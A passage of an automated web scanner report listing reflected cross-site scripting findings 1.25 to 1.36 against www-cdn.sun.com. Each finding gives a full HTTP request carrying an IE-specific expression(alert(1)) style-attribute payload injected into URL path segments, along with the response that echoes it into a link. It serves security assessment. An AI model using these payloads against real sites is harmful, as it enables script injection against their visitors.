P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js442f4"style="x:expression(alert(1))"1733b1bfede/s_code_remote.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.25. http://www-cdn.sun.com/js/s_code_remote.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/s_code_remote.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2dde"style%3d"x%3aexpression(alert(1))"24c9bd8749f was submitted in the REST URL parameter 2. This input was echoed as e2dde"style="x:expression(alert(1))"24c9bd8749f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js/s_code_remote.jse2dde"style%3d"x%3aexpression(alert(1))"24c9bd8749f HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:19:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/s_code_remote.jse2dde"style="x:expression(alert(1))"24c9bd8749f&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.26. http://www-cdn.sun.com/js/sniff.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/sniff.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0763"style%3d"x%3aexpression(alert(1))"aab6caaad4c was submitted in the REST URL parameter 1. This input was echoed as e0763"style="x:expression(alert(1))"aab6caaad4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /jse0763"style%3d"x%3aexpression(alert(1))"aab6caaad4c/sniff.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:15:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16027

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/jse0763"style="x:expression(alert(1))"aab6caaad4c/sniff.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.27. http://www-cdn.sun.com/js/sniff.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/sniff.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfe71"style%3d"x%3aexpression(alert(1))"72dafef929a was submitted in the REST URL parameter 2. This input was echoed as dfe71"style="x:expression(alert(1))"72dafef929a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js/sniff.jsdfe71"style%3d"x%3aexpression(alert(1))"72dafef929a HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16027

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/sniff.jsdfe71"style="x:expression(alert(1))"72dafef929a&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.28. http://www-cdn.sun.com/share/metrics/metrics_group1.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/metrics/metrics_group1.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcdf0"style%3d"x%3aexpression(alert(1))"5046987b06c was submitted in the REST URL parameter 1. This input was echoed as bcdf0"style="x:expression(alert(1))"5046987b06c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /sharebcdf0"style%3d"x%3aexpression(alert(1))"5046987b06c/metrics/metrics_group1.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://java.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 14:42:28 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&refurl=http://java.com/en/&category=se">
...[SNIP]...

1.29. http://www-cdn.sun.com/share/metrics/metrics_group1.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/metrics/metrics_group1.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e051"style%3d"x%3aexpression(alert(1))"684d4da7310 was submitted in the REST URL parameter 2. This input was echoed as 5e051"style="x:expression(alert(1))"684d4da7310 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /share/metrics5e051"style%3d"x%3aexpression(alert(1))"684d4da7310/metrics_group1.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://java.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 14:43:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/share/metrics5e051"style="x:expression(alert(1))"684d4da7310/metrics_group1.js&refurl=http://java.com/en/&category=se">
...[SNIP]...

1.30. http://www-cdn.sun.com/share/metrics/metrics_group1.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/metrics/metrics_group1.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b935"style%3d"x%3aexpression(alert(1))"a60bd884a65 was submitted in the REST URL parameter 3. This input was echoed as 6b935"style="x:expression(alert(1))"a60bd884a65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /share/metrics/metrics_group1.js6b935"style%3d"x%3aexpression(alert(1))"a60bd884a65 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://java.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 14:43:47 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/share/metrics/metrics_group1.js6b935"style="x:expression(alert(1))"a60bd884a65&refurl=http://java.com/en/&category=se">
...[SNIP]...

1.31. http://www-cdn.sun.com/share/omniture/s_code_remote.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/omniture/s_code_remote.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d92ac"style%3d"x%3aexpression(alert(1))"c1d05716860 was submitted in the REST URL parameter 1. This input was echoed as d92ac"style="x:expression(alert(1))"c1d05716860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shared92ac"style%3d"x%3aexpression(alert(1))"c1d05716860/omniture/s_code_remote.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:16:37 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/shared92ac"style="x:expression(alert(1))"c1d05716860/omniture/s_code_remote.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.32. http://www-cdn.sun.com/share/omniture/s_code_remote.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/omniture/s_code_remote.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e175"style%3d"x%3aexpression(alert(1))"00c89433569 was submitted in the REST URL parameter 2. This input was echoed as 8e175"style="x:expression(alert(1))"00c89433569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /share/omniture8e175"style%3d"x%3aexpression(alert(1))"00c89433569/s_code_remote.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response (redirected)

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:16:51 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js8e175"style="x:expression(alert(1))"00c89433569/s_code_remote.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.33. http://www-cdn.sun.com/share/omniture/s_code_remote.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/omniture/s_code_remote.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab97d"style%3d"x%3aexpression(alert(1))"46a7443113d was submitted in the REST URL parameter 3. This input was echoed as ab97d"style="x:expression(alert(1))"46a7443113d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /share/omniture/s_code_remote.jsab97d"style%3d"x%3aexpression(alert(1))"46a7443113d HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response (redirected)

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:50 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/s_code_remote.jsab97d"style="x:expression(alert(1))"46a7443113d&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.34. http://www-cdn.sun.com/share/op/oo_conf_en-US.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/op/oo_conf_en-US.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2675e"style%3d"x%3aexpression(alert(1))"d59bd93f87 was submitted in the REST URL parameter 1. This input was echoed as 2675e"style="x:expression(alert(1))"d59bd93f87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /share2675e"style%3d"x%3aexpression(alert(1))"d59bd93f87/op/oo_conf_en-US.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:15:50 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16066

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/share2675e"style="x:expression(alert(1))"d59bd93f87/op/oo_conf_en-US.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.35. http://www-cdn.sun.com/share/op/oo_conf_en-US.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/op/oo_conf_en-US.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0fa"style%3d"x%3aexpression(alert(1))"301796c3067 was submitted in the REST URL parameter 2. This input was echoed as 3a0fa"style="x:expression(alert(1))"301796c3067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /share/op3a0fa"style%3d"x%3aexpression(alert(1))"301796c3067/oo_conf_en-US.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/share/op3a0fa"style="x:expression(alert(1))"301796c3067/oo_conf_en-US.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.36. http://www-cdn.sun.com/share/op/oo_conf_en-US.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/op/oo_conf_en-US.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc6b"style%3d"x%3aexpression(alert(1))"fc9898b9044 was submitted in the REST URL parameter 3. This input was echoed as ddc6b"style="x:expression(alert(1))"fc9898b9044 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /share/op/oo_conf_en-US.jsddc6b"style%3d"x%3aexpression(alert(1))"fc9898b9044 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
